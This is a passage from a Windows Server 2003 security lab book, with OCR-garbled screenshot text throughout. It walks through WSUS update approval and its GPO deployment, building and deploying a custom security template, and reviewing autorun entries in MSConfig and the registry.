18. In the left-hand pane, in the View section select the drop-down lists to observe the

products and classifications, approval status, and synchronization status.

In the three drop-down lists, select All Updates, All Updates, and Any Time, then click
Apply to view all updates.
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/ J,Wlndows Server
¥

Update Services

5] Updates

Update Tasks

o

% Change approval
ﬁ Decline update

Yiew

Select the criteria you want ko use
to Filker the view,

Products and classifications:

- | i
= o o B e e o e

I All updates =1
Approval:

I All updates ;I
Synchronized:

| Any time ;I

Contains bext:

~iE] =

Apply |

-l

|@ Dane

7 Approve Updates - Web Page Dialog

Select an update in the right-hand pane. In the left-hand pane, in the Update Tasks
section, click Change Approval.

Review the contents of the dialog box. In the Approval drop-down list, select Install.
Click OK. You will see this update now configured to install in the Approval column.

|

‘fou can specify a default approval setting for All Computers and any necessary specific settings for each computer

aroup, For definitions of approval options, se Update Approval snd Status Terminology.

By deFault, take this action on the selected updates For All Computers:

Approval: |petectorly =
Deadline: [Tnstal

o et appreved . LR

Compter Group | approval Deadine
Unassigned Computsrs Same as All Computers qroup Same as All Computers graup

| @ The selected update does not support removal,

@) el oK. Cancel

[nttp: friofwsUSAdmin/Updates/ApproveDialog.aspx7Updateld=7bfbb4ab-0e [ Trusted sites

You have now walked through the process of configuring WSUS to synchronize and

61

download the approval list of updates or to store updates locally and maintain the approval
list. You have performed an approval of one or more updates.
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Next you must configure systems to receive updates from the WSUS server. This is done
by Group Policy Objects (GPOs).

Automated Patching in Domain Mode: Configuring Systems
to Update from WSUS

1.  On the Windows Server 2003 domain controller, log in as a Domain Administrator.
b
2. From Administrative Tools, launch Active Directory Users And Computers (ADUC).
il
@ File  Action Wiew ‘window Help |_|_|- g il
e+ E@EBXFRE 2 Qb vagn
@ Active Directory Users and Computer | Hardened Servers 0 objects
D Saved Queries Name  / [ Type | Description |
=) @ mobeer, com
[-{23] Buitin There are no items ko shaw in this view,
D Computers
{&] Domain Controllers
[:I ForeignsecurityPrincipals
|2 LostandFound
(2] NTDS Quotas
[:I Program Data
[ system
[0 Users
4 | 2
| \ |

Earlier, in Task 2.1, you created an OU called Hardened Servers. Right-click this OU
and select Properties. Select the Group Policy tab.

&5 Active Directory Users and Computer | Hardened Servers 0 objects
(21 saved Queries
=] @ mobeer.com
(22 Builtin
L[] Computers
(] Domain Cantrollers
(21 ForeignsecurityPrincipals
(1 LostandFound
(21 NTDS Quotas

Hame / [ Tvpe [ Cescription

There are no items to show in this vie

H Hardened Servers Properties 7| %
(Z1 Program Data B 21
(3 system General | Managed By | Object | Security | COM+  Group Policy |

(0 users

..[&] Hardened Servers To imprave Group Policy management: [

Management Console (GPMC),

O
Current Group Poliey Object Links for Hardened Servers
5

't the Graup Policy

Group Policy Object Links | Mo Overide | Disabled |
Services Lockdown

Group Policy Objects higher in the list have the highest pricrity.

3 This list obtzine fiom. i mobeer. com
Mew | agd. | Ea | |
Optiors.. | Delete. | Properies | Dowr |

™ Black Palicy inheritancs

Close | Cangel | Apply |
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4. Click New and name the new GPO WSUS Clients.

Hardened Servers Properties

Eenelal' Managed Ey' Elb|ect| Securlty| COM+  Group Policy |

21x

Taimprove Group Policy management, upgrade to the Group Policy
Management Conzale [GPMC).

O
Current Graup Policy Object Links for Hardened Servers
—

Group Policy Object Links | Mo Overide | Digabled ‘

Services Lockdown

Group Policy Objects higher in the list hawve the highest priority.
This list obtained from: rio.mobeer. com

Hew add. | Edi | v |
DOptione... | Delete... | Properties | o |
[ Block Policy inheritance
Close I Cance| | Zpply |

5. Click Edit. Expand the GPO to view Computer Configuration » Administrative
Templates » Windows Components » Windows Update. Review the various GPO
configuration settings available.

Group Policy Dbject E ¥ alglll

File  Action Wiew Help
&= | || @

WSS Clients [rio.mobeet,com] Policy Setting | State |

=] @ Computer Configuration
(Z1] Software Settings
(2] Windows Settings
=11 Administrative Templates
[=1-[27 windows Components

D MetMeeting
(] Internet Explorer

12 application Compatibility
(] Evert Viewsr
D Internet Information Services
D Security Center

123 Task Scheduler
-] Terminal Services
-] windows Explorer
-] Windows Installer

I:I windows Messenger
(7] windows Media Digital Rights 1
[ Windows Movie Maker

(23 windows Media Player
([ System
[+ Mebwork
D Prinkers
=] & User Configuration
(23] Software Settings
(Z] windows Settings
=[] Administrative Templates

4 |

2

@ Do nat display 'Tnstall Updates and Shut Down' option in Shut Do...
@ Do not adjust defaul option to 'Tnstall Updates and Shut Down'in,.,
@ Configure Automatic Updates
@ Specify intranet Microsoft update service location
@ Enable client-side targeting
@ Reschedule Automatic Updates scheduled installations
Mo auto-restart For scheduled Automatic Updates installations
@ Automatic Updates detection frequency
@ Allow Automatic Updates immediate installation
@ Delay Restart For scheduled installations
@ Re-prampt for restart with scheduled installations
@ Allow non-administrators to receive update notifications

Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured
Mot configured

Extended p, Standard
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6. Double-click Configure Automatic Updates. Notice the Explain tab on the properties
of each setting.

21

Setting | Explain |

ﬁ Configure Automatic Updates

" Mot Configured
# Enabled
" Disabled

Configure automatic updating:

3- Auto download and notify for install |

2 - Matify for dawnload and natify For install
3 - Auto download and notify for install

Scheduled install tme: 01300 |

Supparted or: Windows Server 2003, %P SP1, 2000 SP3
Pieiosdelivg | NewSeling |

0K | Cancel | ok

7. Enable Configure Automatic Updates.

From the Configure Automatic Updating drop-down list, select Auto Download And
Schedule The Install.

)’ The default configuration schedules the install to occur every day
A TE at 3:00 a.m. These settings are acceptable for the purposes of this task.

8. Click Next Setting. This brings up the Specify Intranet Microsoft Update Service
Location Properties dialog box.

Specify intranet Microsoft update service locati; 21x|

Selting | Explain |

ﬁ Specify intranet Microsolt update service location

€ Mot Configured
& Enabled
© Disabled

Set the intranet update service for detecting updates:

Ihtlp /1o mobeer.com

Set the intranet statistics server:

Ihtlp /o, maobeer.com

[example: hitp: //Intranetl pd01]

Supported or: Windows Server 2003, XP 5P1, 2000 5P3
Previous Setting | Mext Setting |

0K | Cancel | ok
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9. Enable the setting. Specify the WSUS server in the two fields. These fields must both be
filled in and must follow the specified format:

= http://server (Hostname or IP address minimum, fully qualified domain name
[FQDN] preferred)

= http://server.domain.com (Hostname or IP address minimum, FQDN preferred)

If the WSUS server is specified by name, name resolution services must be
TE configured properly in your network environment.
10. Click OK.

These two are the minimum required settings to configure clients to use the WSUS
services. Feel free to configure additional settings as desired in your environment.
When you have completed configuring these settings as desired, close the GPO by
clicking the X in the upper-right corner.

Only computer objects that reside in the Hardened Servers OU are subject
TE to this GPO and these settings. Move the appropriate computer objects

into this OU.

You have now configured systems to utilize the WSUS services and automatically receive
approved updates.

Criteria for Completion

You have completed this task when you have performed updates manually by going to
the Microsoft Update website; configured clients to automatically download and

install updates; configured WSUS to synchronize the update list; approved selected

(and tested) updates; and configured clients to receive WSUS approved updates by GPO.

Task 2.4: Security Templates

In a large network environment, the challenge of configuring security on many systems
can be daunting. Configuring a security template and deploying this standardized security
configuration simultaneously to many systems can simplify this process substantially.

Scenario

You have just completed assembling 20 Windows Server 2003 systems for a new department.
These systems require a specialized and uniform security configuration. You must develop
and deploy a custom security template to these systems.
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Scope of Task

Duration
This task should take 90 minutes.

Setup

Security templates can be reviewed, developed, and deployed from a single system in the
environment. A convenient system to use for this process is a domain controller, since it has
all of the required tools already installed.

Caveat

The deployment of security templates can cause serious problems in networks. These are
powerful controls, which can severely restrict functionality of the systems. Use caution and
test these templates prior to deployment. If you’ve ever locked yourself out of your car or
house, you understand the seriousness of this caveat.

Procedure

You will configure a custom security template and incorporate it into a GPO for
deployment to your specialized systems.

Equipment Used
For this task, you must have:

= Windows Server 2003 system, domain controller

Details

You will first build an MMC with the proper security-related snap-ins. You will then do

a quick review of the default templates supplied by Microsoft. Then you will launch the
Security Configuration And Analysis tool (SCAT), and create a custom template that meets
your specialized security needs. Last, you will deploy the security template by GPO to the
target systems for a uniform security configuration.

Security MMIC and Default Templates

1. Log on to the Windows Server 2003 domain controller as a Domain Administrator.
From the Start menu, select Run. Type MMC and click OK.

In the MMC, select File » Add/Remove Snap-in.

Click Add.

In the Add Standalone Snap-in dialog box, scroll down and select Security
Configuration And Analysis, then click Add.

o w N

6. In the Add Standalone Snap-in dialog box, select Security Templates and click Add.
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(=[S

"ffi Console1 - [Console Rook]

% File  Action  View Favortes  Window  Help

| =lmi ]

e o |[m | B[

{3 Console Rook Mame

Add/Remove Snap-in

Standalone | Estensions |

x| in this view

e thiz page to add or remove a standalone Snap-n fram the consale,

Shap-ins addsd to |a Console Root

d &

5 Secuiity Configuration and Analysis
5P Secuity Templates

Add Standalone Snap-in 21x|
Aveailable Standalone Snap-ins:
Shap-in | “endor ‘;I

@ Remaovable Storage Management
F\esultant Set of Policy

E Routing and Remote Access

@ Security Configuration and Analysis

- Description

Security Templates

% Services
Q Shared Folders
Telephony

Add Femove |

€2 UDDI Services
Ewing
=

ok [ Descrintion

Secuity Templates is an MMC snap-n that provides editing capabiities for

Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
Microsoft Corporation
-

Microsoft Corporation

security template files,

Click Close, then click OK.

i ] oo |

8. [Expand Security Templates: C: \WINDOWS\security\templates.

" Consolel - [Console Root]

“f1 Fle Action View Favorites Window Help

=10lx|

[SETES]

o ||mE @

curity Templates

=8 CWINDOWS\securityltemplates
compatws

hisecdc

hisecws

rontsec

seturede

securews

setup security

£ I_Name
Security Configuration and Analysis 5 security Canfiguration and Analysis
5P Security Templates

67

9. Microsoft provides several default security templates during installation. They are
contained in files with a .1inf extension in the path indicated.
= Setup Security—Configures security settings to match a fresh install of the
operating system.
s Securedc and Securews—Stronger security for domain controllers and for
workstations and servers, respectively.

= Hisecdc and Hiscews—Still stronger security for domain controllers and for
workstations and servers, respectively.
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s Compatws—Weakens permissions on the files and folders under the Windows
folder to match that of Windows NT 4. This level of permissions may be required
to run legacy (NT 4) applications.

= Rootsec—Resets folder permissions on the root of volumes to the original, default
permissions. This may be required if these permissions have gotten adjusted

erroneously.

Your system may have slightly different templates available. These,

TE however, are a fairly standard collection.

10. Save the MMC by selecting File > Save As, then name the file Security.msc and click Save.

Security Configuration and Analysis: Creating a Custom Security Template

1.

2.

"I Consolel - [Console Root\Security Configuration and Analysi

Click on Security Configuration And Analysis.

—ioix|

"% Fie Action View Favorites Window Help

(IS

=)

L1 Console Root

ration ar
urity Templates

2
3

scope item

ERI)

Open

Security Configuration and

&
= CAWINDOWS securibyltemplates Analysis
-/ 8 compatws
B[ hisecdc
-9 hisecws To Open an Existing Database
B-[§ rootsec
B[ § securedc 1. Right-click the Security Gonfiguration and Analysis
B[ 8 securews scope itern
setup security Click Open Database

Select a database, and then click Open
To Create a New Database

Right-click he Security Configuration and Analysis
Click Open Database

Type a new database name, and then click Open
Select a security template to import, and then click

Dane

In the left-hand pane, right-click on Security Configuration And Analysis and select
Open Database. Type the name Hardened Servers, and click Open.

Lockin: [ () Diatabasse = a2 E
File name: [Hardened Serverd =l Open |
Files of lpe: |Securty Databass Fies [ sob) | Cancel
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3. Select the securews.inf default security template.

Import Template

2x

Look ir: I ) templates

B RN = e

palicies }setup securiby,inf
}compatws.\nf
}h\secdc.lnf
}h\secws.lnf
“Frootsec.inf
% securede.inf
i

File marne:

Isecurews inf

Open I

Files of type: ISecurily Template [.inf)

™ Clear this database befare importing

d Cancel

4. Click Open.

5. In the left-hand pane, right-click on Security Configuration And Analysis and select

Analyze Computer Now.

"fi Console1 - [Console Root'\Security Configuration and A (=]}
“) Fle Acion View Favortes Window Help | =ts( ]
=l

[ Consale Ry
- BHEE figuration and A
= B Security Templates
EHC8 CWINDOWSisecurity)l _ Open Datahase.,
[+l & compatws AN .
hisecdc Configure Computer Now,

Open

N-NACe CnearityiDatabase'Hardened Servers.sdb

TE

ings in this database.
hisecws Saye
1@ rootsec Import Template... e Your Computer
securedc Export Template..
SECUrews Yiew Log File:
[ setup sscuriy k the Securty Confiquration and Analysis

View 3

Hew Window from Here

Hew Taskpad View. .

nfigure or analyze your computer by using

m

onfigure Computer Now

log, type the name of the log file you wish to
then click OK

Help

is complete, you must perform an
analysis to view the information in your database

To Analyze Your Computer Security Settings

1. Right-click the Security Configuration and Analysis
scope item =

‘Compares the current computer settings against the security settings in the database | [

Do not select Configure Computer Now. Doing so would implement this
strong security template on the system you are currently working on. This
could cause the failure of desired functionality and could disable you from
accessing the system.

Accept the default path for log files by clicking OK.

Once the analysis is complete (this should take just a few seconds), expand Local
Policies and select Audit Policy.

69
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"fi Consolel - [Console Root'Security Configuration and Analysis'Local Policies WAUSIEIRaN -0 5||
By Fle Action Wiew Favories Window Help ‘_ 8] x|
s X B8 \

(L] Console Raat
-5 Security Configuration and Analysis

H Account Policies
! B 2g Local Policies
i Audic Palicy
User Rights Assignment

Security Options

Palicy [ Database Setting | Computer Se
[#4udit account logan everts Success, Falure No auditing
M audit account management Success, Failure No suditing
wudit directory service access Mot defined No audting
udit logon events Failure Mo auding

wdit object access o auditing No auditing
wdit policy change Success, Failre o suditing

Eventlog
Restricted Groups wdit privilege use Falure No auditing
System Services 2 Audit process tracking Ko audting No auditing
Registry [8audit system everts o auditing No auditing
8 File System
-5 Security Templates
4 | |

8. Double-click Audit Process Tracking in the right-hand pane. Enable the policy and
configure it for Success and Failure.

Audit process tracking Properties llil

Analpzed Secuity Policy Setting I

Audit process acking

-
e

Computer setting

IND auditing

¥ Define this policy in the database:
Audit these attempts:
¥ Success
[¥ Failurz

These settings alfect the database only. They do not change curent
computer zettings.

(u] I Cancel Apply

9. Click OK.

You have just customized the security template. You could make additional
TE configuration changes, as desired, for this new custom template.

10. Once you have introduced all of the desired security configuration parameters for the
new custom template, in the left-hand pane right-click on Security Configuration And
Analysis and select Save.
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G Fle Action View Favortes Window Help
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=10/ x|

| =l x|

User Rights » Configure Computer Naw,

rices
8] Event Log Tmpart Templats
{8 Restricted GroUE Export Template...
{28 System Services
28 Reaistry e
{8 File: System View »
(5B security Templates  New Window from Here

View Log File

New Taskpad Visw. .
Export List...

Help

A== \
10 Consdle Root. [ Mame [ Description
EE= ] u = Ima. clicies Password and account lockout policies
Account Policies WD fes Audting, user rights and security options |
E-28) Local Folicies Open Database...
e Event Log
Aud Pl | Groups Restricted Groups

System service settings
Registry security settings
File security ssttings

[Save the template

ecurity Configuration and Analysis:

11. Right-click on Security Configuration And Analysis and select Export Template.

—iol x|

% Fle  Action  View Favorites Window Help

[T

= |BnB 2

(21 Console Root Wrﬂe

[ Deseription

°9 wr— e
Account Polisies. OPe™ s
Local Pelicies Open Database...
swdt Policy  Anelyze Computer Now.. P
Groups.
User Rights  Configure Computer Nowv...
ervices

Security Opl 9ave
Import Template. .

Export Template. "
{8 System Services View Log File

08 File system View b
5 Securty Templates | New Window from Here

News Taskpad View
Export List.

Help

4]

Pasaword and account lockaut polides
Auditing, user rights and security options |
Event Log

Restricted Groups

System service settings

Registry security settings

File security settings

[Exxparts the base template for the current computer

Export Template To

Save in | 19 templates

H o2 &

2%

palicies
"% compatws.inf
3hisecdc.inf
" hisecws inf
“roctsec.inf
3sacuredc‘\nf
"% securamws.inf
3setup security.inf

File name: IHaldened Servers

S [ sae

Saveastype  |Securty Template [inf]

= Cancel

12. Type the name Hardened Servers and accept the default extension .1inf by clicking Save.
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This template is now available in the folder C: \WINDOWS\security\templates.
TE

Security Template Deployment by GPO
1. From Administrative Tools, launch Active Directory Users And Computers.

2. Earlier, you created an OU called Hardened Servers. Right-click this OU and select
Properties. Select the Group Policy tab.

3. Click New and name the new GPO HS Security Template.

~Iol]
<5 Ele  Acton Yew Window Help ‘ -l |
e HE s xH0E 2 Bl van
<23 Active Dirsctory Users snd Computer | Hardsned Servers 0 objscts
(] Saved Queries Mame [ Type [ Description ]
= mobeer.com
(22 Builtin There are no ibems to show in this view,

(L3 Computers Hardened Servers Properties 21x|

Domain Controllers

(L ForsignSecurityPrincinsls General | Managed By | Object| Secury| COM+ Group Policy |

Hardened Servers
(2 LostAndFound T improve Group Policy management. upgrade to the Group Policy
(1 NTDS Quintas Management Cansole (GPMC).

a
(2 Program Data B B Pt O Lt e S
=

Group Policy Dbject Links No Ovenide | Disabled
Services Lockdown
EPWSUS Clients

tv Template

Group Policy Objects higher in the list have the highest priority.
This list obtained from: rio.mobeer.com

New bgd. | Edt | w |
Options.. | Delete. | Properies | Dawn |
K |
[ I Block Policy inhetance

Cose || Cencel || mb |

4. Click Edit. Expand the GPO to view Computer Configuration » Windows Settings
and click Security Settings.

5. Right-click on Security Settings and select Import Policy.

'§ii Group Policy Dbject Editor ol x|

Eile  Action ¥iew Help

_ X B2
=¥ schTasks [del test.bfrc] Palicy Mame | Description
-3 Computer Configuration EPaccount Policies Password and account lockout policies
Bl (] Softwars Settings ﬁmza\ Policies Auditing, user rights and security options policies
E-( Windows Settings ZEvent Log Event Log
Scripts (Startupishutd: | C@pestricted Groups Restricked Groups
= Dunt e“ oy [Services System service settings
Local P Import Policy... Registry security settings
Event Lt Export policy.., em File security settings
@ Restrict Reload Mebwork (IEEE 802.1... ‘Wireless Metwork Policy Administration, Manage th...
T8 System v Polics

(8 Regitry_ 18 ¥ o Restriction Policies
08 File Syt Export List... ity Palicies on Active ... Tnkarnet Prakaral Security (IPSec) Administration. ...

{2 Public ke Help
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6. Select the Hardened Servers.inf template and click Open.

Import Policy From ﬂll

Look jn Il'f}temp\ales j €] % e -
policies " biesaclsinf
% compats.inf “Brootsec.inf
“HDC security.inf “bsecurede.inf
i [ Dsecurews.inf
P hisecde. inf B setup security inf

P hisenws.inf

File marne: |Ha|daned Servers.inf Open I
Files of type: ISecunly Template [inf] j Cancel

™ Clear this database before imparting

v

7. Expand Local Policies and select Audit Policy. You should observe your custom
setting of Success and Failure for the Audit Process Tracking audit policy. Confirm the
presence of any other template settings you may have configured.

"fi Group Policy Object Editor _(O] ]

File  Action Wiew Help

& =+ ¥ B2

j:_j HS Security Template [rio.mobeer.com] Policy | Policy  # | Policy Setting

gl Computer Configuration Audit account logon events Success, Failure
{1 scftware Settings Audit account managernent Success, Falure

{2 Windows Settings Audit directary service access Mot Defined

Seripts (StartupfShutdown) [85] sudit logon events Failure

Securicy Settlng.s Audit object access Mo auditing

(- Account Policies o

O Loeal Polic [2%) audit policy change Success, Failure

i [&8) audit privilege use Failure

AL 5
Audit process tracking Success, Fallure

User Rights Assignment 2 N =
28 Security Options Audlt system events Mo auditing

5 Event Log
{8 Restricted Groups
-8 System Services

Y wirsless Network (IEEE 802,11
[23 Public Key Policies
|2 Software Restriction Policies
(-8, P Security Palicies on Active Di
-1 Administrative Templates
EI"@ User Configuration

B+ Software Settings
+ (] Windows Settings
-] Administrative Templates

4 | | K1 | W
| | \

8. Close the GPO by clicking the X in the upper-right corner.

Any computer account you place in the Hardened Servers OU is now
TE subject to this new security template.



74 Phase 2 = Hardening Systems

Criteria for Completion

You have completed this task when you have built the Security MMC and reviewed the
default security templates; imported a template into the SCAT; analyzed the local system
security; modified, saved, and exported the new custom template; and then imported the
custom template into a GPO for mass deployment of these custom security settings.

Task 2.5: Securing Autoruns

Autoruns are applications and processes that are configured to launch at bootup or at
logon. There are several ways to cause this to happen. These applications and processes
are generally performing desirable activities; however, they may contain vulnerabilities, be
specifically planted to introduce vulnerabilities, or even perform destructive processes. It is
therefore a wise thing for an administrator or security professional to understand exactly
what applications and processes are configured to autorun, and to control these processes
carefully.

In addition to the procedures outlined in Task 2.5, there are several utilities that may be
useful in the identification and management of autorunning applications and processes.

In Microsoft’s Windows Defender, on the Tools And Settings page, Software Explorer
presents several categories of programs that are currently running on a system, including
Startup Applications. Windows Defender can be downloaded from www.microsoft.com/
windows/products/winfamily/defender/default.mspx.

Another worthy tool to assist with this administrative task is Windows Sysinternals
Autoruns. This freeware tool can be downloaded from http://technet.microsoft
.com/en-us/sysinternals/bbh842062.

Scenario

You are an administrator responsible for the maintenance and security of several servers
holding sensitive data. You want to identify the autorun applications and processes and be
certain that no undesirable applications or processes are running on these systems.

Scope of Task

Duration
This task should take 60 minutes.

Setup

You will interrogate a system for any autorun applications or processes and attempt to
identify them. To accomplish this you will utilize several utilities and look in several
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locations on the system. You will also interrogate a domain controller to identify any
startup, logon, logoff, and shutdown scripts that may be configured.

Caveat

Removing any autorun applications or processes may cause desirable applications and
processes to fail. Often, these executables are not obviously named to identify their
function. Remove these autorun applications or processes cautiously and test the system
after the removal process.

Procedure

You will begin the system interrogation by launching MSConfig, the System Configuration
Utility. You will then use Regedit to identify any Run, RunOnce, and RunOnceEx settings.
You’ll look at the Startup folders for users on the system, the Config.sys and Autoexec
.bat files (for Win16 applications, processes, and drivers), and finally a domain controller
to identify any startup, logon, logoff, and shutdown scripts that may be configured.

Win16 applications were written to run on Windows for Workgroups, version
TE 3.11.Win16 apps use the Config.sys and Autoexec.bat files to configure
the system environment for these applications. All versions of Windows
up to Windows Vista 32-bit and Windows Server 2008 32-bit operating
systems provide support for these legacy applications. Windows 7 32-bit
provides “some” support for 16-bit applications, but it seems it is spotty, at
best. Windows Vista 64-bit, Windows 7 64-bit, and Windows Server 2008
64-bit operating systems do not provide support for Win16 applications.

Equipment Used
For this task, you must have:
= Any Windows XP or Server 2003 system

= For the startup, logon, logoff, and shutdown scripts that may be configured, access to a
Server 2003 domain controller

s Local or Domain Administrator access

Details

MSConfig: The Microsoft System Configuration Utility
1. Logon to a system as a Local or Domain Administrator.

2. Select Start » Run and type MSConfig. Click OK.
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3.  On the General tab, notice the various startup options available.

&' System Configuration UEility 5[

GEHETG‘ISVETEM‘INI WIN.IMI | BOOT INI | Services | startup |

[ Startup Selection

1+ Hormal Startup - oad all device drivers and servicesi

" Diagnostic Startup - load basic devices and services only
" Selective Startup

¥ | Process SYSTEM.IMI File

I¥ | Process WININI File

¥ | Unad System Services

¥ Load Startup Items

4% sz Original BOOT.IHNE € Use Modified BOOT, INT

Launch SystemRestore | ExpandFle.. |

ok | comed | amy | men |

4. Select the SYSTEML.INI tab. This file is processed any time a Win16 application is
launched.

1, System Configuration Utility 5[

General  SYSTEM.INI | wins.In | BOOT.Iu | Services | startup |

[Mave Up

Move Down

TTFontDimenCacheDBCS] Enable

Disable

Firud

Hew

Pl

Edit

Enable Al Disable Al I
QK I Cancel | Apply | Help |

5. Select the WIN.INI tab. This file is also processed any time a Win16 application is
launched.

=l System Configuration Utility x|

General | SYSTEM.INI WIN.INI | BoOT.Iu1 | Services | startup |

+ For 16-hit app support Move Up
fonts]

extensions] Move Down
mci extensions]

MCI Extensions BAK] Enable

Disable
IRIS_IFE] Find
DFE] New

[spooler]
Edit

Pl e

Enable Al Disable All I
ok | concel | aply | nep |




Review these files to identify any applications, processes, or drivers that may be

undesirable.

Select the BOOT.INI tab. This file provides the Startup menu as you power on a
system. Confirm that the paths and default are mapped to desired instances of the

operating system.
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a4 System Configuration Utility

General | sYSTEM.IN | win.Inr BOOT.IND | services | startup |

timeout=5

it 3t
multif0ydisk{drdisk{0ypar

default=multi{0}disk{Drdisk{0}partition{ 1)\ WINDOWS
5

tition{ 1 WINNT="Microsoft Windows 2000 Server" Fastdetect 3
CHCMDCONSYBOOTSECT. DAT="Microsoft Windows Recovery Cansole” femdcons
‘

Check all Boot Paths

Set as Defaul: Move Up

| Mowe Diown

Boot Options

[ jsapepoor L MMIMAL € NETWORK €/ DSRERATR
- Lol

[ INOGUIEOOT
[ jgooTios
™ [BASEVIDEO
I J505

I ALCALTERMATESHELL)

Advanced Options...

Timeout: I 5 sEC,

OF I Cancel

| Apply | Help

Select the Services tab. Review these services to identify any that may be undesirable.

Managing services was covered in Task 2.1.

s System Configuration Utility ZI
tGeneral | SYSTEM.INE | Wi INT | BOOT.INE - Services | startup |

Service I Essential I Manufacturer I Skatus l;l
Metwork Location Aware... Microsoft Corporation Runining
Symankec Ankivirus Client Unknown Running

T LM Security Support ... Microsoft Corporation Stopped
Removable Storage Microsoft Corporation Stopped

Office Source Engine Unknown Stopped

Plug and Flay Microsoft Corporation Running J
Pl Driver HPZ12 HP Stopped

IPSEC Services Microsoft Corporation Runining
Protected Storage Microsoft Corporation Runining

Remaote Access Auto Ca... Microsoft Corporation Stopped

Remote Access Connect, ., Microsoft Corporation Running

Remote Deskkop Help Se. .. Microsoft Corporation Stopped

14| |*

I™ Hide All Microsoft Services Enable Al | Disable All
oK I Cancel | Apply | Help |

Finally, select the Startup tab. This is a list of applications and processes that launch at

startup or logon, configured in the Registry and in the All Users Startup folder.
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&l System Configuration Utility x|
General | SYSTEM.INI | WIN.IND | BOOT.INI | Services Startup |
Startup Item Command [ Location |
FxMon "C:iProgram Files\Rox...  HKLMSOFTWARE\Microsoftiwindows\CurrentVersioniRun
qttask “CiiProgram Files\Qui...  HELMISOFTWARE\MicrosoftlwindowsiCurrentyersion|Run
MeroCheck  C:\WINDOWS\system.., HKLM\SOFTWAREIMicrosoftiwindows\CurrentersionRun

vphray CAPROGRA~IISYMA,..  HKLMISOFTWARE|Microsoft\windows\CurrentVersion|Run
M3ASCUI “CiiProgram Files\win...  HELMISOFTWARE\MicrosoftlwindowsiCurrentyersion|Run
winshost CAWINDOWS\system. ., HKCUASOF TWAREYMicrosoftiWindows) CurrentversioniRun
Middcg C\Program Files\Crea...  HKCUYSOFTYWARE MicrosoftiWindows) Current¥ersioniRun
Acrobat A...  CAPROGRA-1\Adobe...  Common Starkup
hpoddt01.... CAPROGRA~IYHEWL.., Common Startup
officejet ... CAPROGRA~IYHEWL..,  Common Startup
WinZip Qui... CPROGRA~1WINZI..,  Common Starkup

SOFTWARELMIC

\CurrentVersioniRun

Enetle Al | Disable Al |

ok | cancel | ey | Hep |

Review this list. Any applications or processes that you do not recognize can be further
researched at the following website: www. processlibrary.com/.

Another website that may be able to identify unknown processes is www
.windowsstartup.com/wso/search.php.

10. Clear the check box for any applications or processes that are undesirable.

If the executable is identified as being malicious, it might be prudent to
TE uninstall the application, delete the entry from the Registry, and/or delete
the content from the hard drive.

11. Notice the Location column. This identifies the source of execution for the process: the
Registry and the All Users Startup folder.

12. Click OK to apply your changes and close the MSConfig application. For your changes to
take effect immediately, reboot the system as prompted. Otherwise, select Don’t Reboot.

Regedit Run, RunOnce, and RunOnceEx
1. Select Start » Run and type regedit. Click OK.

Improper editing of the Registry could cause your system, applications, and/
TE or processes to fail. Make changes only if you are certain of your actions.

Registry Editor |
Fle Edit Wew Favorites Help
£ & My Computer Narme Type [ Data
(] HKEY_CLASSES_ROOT [a8](Default) REG_5Z {value not <

{210 HKEY_CURRENT_USER

My ComputeriHKEY_LOCAL_MACHINE
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2. Expand HKEY_LOCAL_MACHINE » SOFTWARE » Microsoft » Windows »
CurrentVersion » Run. (Notice that this path is displayed in the status bar at the
bottom of the Registry Editor window.)

Registry Editor =1ol x|
File Edit WYiew Favorites Help
-] Reinstal 21 [ ame [ Type [ oata =
(-1 Reliability [ab]¢Default) REG_SZ {value nat set)
R | [ab]zc1z07pd REG_ST
{2 Runonce [ab]nercRilercheck. REG_ST CHWINDOWS\systemaziberocher
{0 RunoniceEx [ab]quickTime Task REG_SZ "CriProgram FilestQuickTimel gttask
{1 Setup Rux\uAudiUCentra\ REG_SZ "Z:\Program Files\RoxiolEasy D C
@ SharedDLLs. Rux\UDragTUDisc REG_SZ "Z:\Program Files\RoxiolEasy D C
Eg :::::CE::;TE?;V o Rux\UEng\nEUt\hty REG_SZ "Z:\Program Files,Common FilesiRec
[]'D Shellscrap SDundMan REG_SZ SOUNDMAN, EXE
{3 shellserviceObizctDelayLoad SunJavaUpdatES‘ .. REG_SZ Z:\Program Files\Javaljrel 5.0_06
100 SideByside = vptray REG_5Z C:\PROGRA~1\S‘(’MANT~1\SVMA_N';|
| |* 1 | v
|My ComputeriHKEY _LOCAL_MACHINE,SOFTWAREMicrosoftywindows\CurrentVer siantRun 4

3. Expand HKEY_LOCAL_MACHINE » SOFTWARE » Microsoft » Windows >
CurrentVersion » RunOnce.

4. Expand HKEY_LOCAL_MACHINE » SOFTWARE » Microsoft » Windows »
CurrentVersion » RunOnceEx.

5. Review the entries in these three locations to identify applications and processes that
launch at system startup.

6. After a careful review, in the right-hand pane right-click on any undesirable
applications or processes and select Delete.

7. Expand HKEY_USERS » DEFAULT » Software » Microsoft » Windows »
CurrentVersion » Run.

g,';" Registry Editor ;Iglgl
File Edit View Favorites Help

{1 Internet 21| name Type | Data

{13 tnternet Settings 28] mefauly REG_57 {value nat set)

{21 Palicies

g

{:I Settings

{1 shell Extensions

D Syncmgr J

{23 Telephony

{23 ThemeManager
i i i i e —y h
| | _>|_I « | |

|My ComputertHKEY_LISER ). DEFAULTYSoftwareiMicrosoft|Windows| Current¥ersion|Run 4

8. Review this location to identify applications and processes that launch at every
user logon.
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9. After a careful review, in the right-hand pane right-click on any undesirable

applications or processes and select Delete.

10. Expand HKEY_CURRENT _USER » Software » Microsoft » Windows »

CurrentVersion » Run.

£ Registry Editor

File Edit Wiew Favorites Help

=[S

=1 [ Hame Type | Data

(Default) REG_SZ (walue nat set)
E"j[reatlve Detector  REG_SZ "1\Program Files\CreativeMedisSource\Detectar|\CTDet
MtdA:q REG_SZ C:\Program Files\Creative Shared Files\Media SnifferiMtc

21 shel wmshnst.exe REG_SZ CWINDOWS)system32iwinshost . exe

Shell Extensions
{23 Syncmar =l
{21 Telephony
i g I!‘lemeManager ;I |

My ComputeriHKEY _CURRENT_USER|SoftwareiMicrosoftiWindowsiCurrentVersioniRun

a el

11. Expand HKEY_CURRENT_USER > Software » Microsoft » Windows >

CurrentVersion » RunOnce.

12. Review these two locations to identify applications and processes that launch at user logon.

13. After a careful review, in the right-hand pane right-click on any undesirable

applications or processes and select Delete.

14. Close Regedit.

Startup Folder

1. Right-click on the Start button and select Explore All Users.

P

Open

Explore
